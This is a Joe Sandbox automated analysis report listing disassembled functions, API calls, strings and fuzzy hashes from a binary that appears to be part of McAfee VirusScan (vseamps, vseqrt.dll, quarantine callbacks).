Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtInit, xrefs: 0000000140002BA3
vseqrtAdd, xrefs: 0000000140002BD5
vseqrt.dll, xrefs: 0000000140002B7E
vseqrtRelease, xrefs: 0000000140002BBA

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452
amps_Init: done, pHandle=%p, xrefs: 00000001400035CC

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

SetDllDirectoryW, xrefs: 0000000140004D58
kernel32.dll, xrefs: 0000000140004D3C

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17
Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6
doMonitor: monitoring process id=%d, xrefs: 000000014000222C

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012DC1
csm, xrefs: 0000000140012E97
bad exception, xrefs: 0000000140012E4A
csm, xrefs: 0000000140012D2F

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFE11BD4804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE11BD4861

Part of subcall function 00007FFE11BD6BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFE11BD6C07
Part of subcall function 00007FFE11BD6BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE11BD6C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE11BD4939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE11BD4B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE11BD4C94

Strings

csm, xrefs: 00007FFE11BD495C
csm, xrefs: 00007FFE11BD487B
csm, xrefs: 00007FFE11BD48E2

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: c4ca6fcda116c8582e449f2c9858de9b4105009696d3dd71130805cd7363b33e
